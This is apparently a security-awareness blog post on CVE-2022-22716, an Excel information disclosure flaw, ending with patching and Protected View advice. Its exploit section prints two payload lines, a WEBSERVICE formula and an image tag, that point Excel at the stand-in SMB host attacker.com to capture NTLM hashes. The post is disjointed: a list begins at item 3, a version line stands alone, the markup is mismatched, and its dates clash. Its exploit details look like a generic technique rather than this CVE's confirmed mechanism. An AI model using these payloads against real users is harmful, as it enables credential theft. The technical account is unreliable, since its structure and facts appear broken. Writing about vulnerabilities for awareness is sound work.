CVE-2022-22716 - Unpacking Microsoft Excel Information Disclosure Vulnerability

On January 11, 2022, Microsoft disclosed a significant vulnerability affecting Microsoft Excel, tracked as CVE-2022-22716. This security flaw falls under the “Information Disclosure” category, meaning it could let an attacker access sensitive device information through a specially crafted Excel file.

In this post, we'll break down what CVE-2022-22716 is, how it can be exploited, and how users can protect themselves. We'll show some code snippets related to the vulnerability and offer references to official sources for further reading.

What Is CVE-2022-22716?

CVE-2022-22716 is an information disclosure vulnerability in Microsoft Excel. When a user opens a specially crafted Excel file (with extensions like .xls, .xlsx, .xlsm, or .xlsb), the application could inadvertently expose information to an attacker. The flaw affects various Excel versions on both Windows and macOS.

How Does the Exploit Work?

An attacker can exploit this flaw by tricking the victim into opening a maliciously crafted Excel file. The exploit is triggered when Excel processes certain formulas or embedded objects that reference external resources or internal data. If successful, the attacker may access sensitive device or network information.

This does not allow the attacker to execute arbitrary code or take full control of the device, but leaked information can be used for further attacks (like phishing or lateral movement).

Technical Breakdown & Code Snippet

Microsoft did not release the full technical details for security reasons. However, the exploit typically relies on embedding a reference to an external resource in a cell formula.

Example Exploit – Leaking NTLM Hashes

One well-known technique involves getting Excel to auto-load images from a remote SMB server, which leaks the user's NTLM hash.

=WEBSERVICE("\\attacker.com\share\file")

Or, an embedded image in the Excel file

<picture>
    <v:imagedata src="\\attacker.com\share\image.png"/>
</picture>

Instead of loading an image, it sends a request to attacker.com.

- During authentication, the user's device sends hashed credentials (e.g., NTLM hash) which the attacker can capture and potentially crack.

Victim opens file: Excel automatically tries to access the remote resource.

3. Information leaks: Device info, user credentials, or other sensitive information is sent to the attacker's controlled server without the victim's knowledge.

It can be that simple. No pop-ups, no obvious clues. Security tools may not always catch it immediately.

Excel 2016, 2019, Microsoft 365 (macOS)

Check your version and apply the latest patches as soon as possible.

Microsoft released a fix as part of its January 2022 updates.

Download the security updates for Office

Use Protected View:

By default, files from the internet open in Protected View. Don't enable editing unless you trust the sender.

References

- Microsoft Advisory for CVE-2022-22716
- NVD Entry
- Microsoft: Prevent Information Disclosure via Excel
- Excel Security Best Practices

Conclusion

While CVE-2022-22716 may not let attackers take over your device, leaking device or credential information is a serious risk. Attackers can use this data for further attacks. Always keep your software updated and be careful with unknown attachments.

Stay safe, and check for security updates regularly. For more deep dives into vulnerabilities, follow our page!


*This article is independently created for security awareness. For more details, always refer to official advisories and resources.*

Timeline

Published on: 02/09/2022 17:15:00 UTC
Last modified on: 03/04/2022 21:31:00 UTC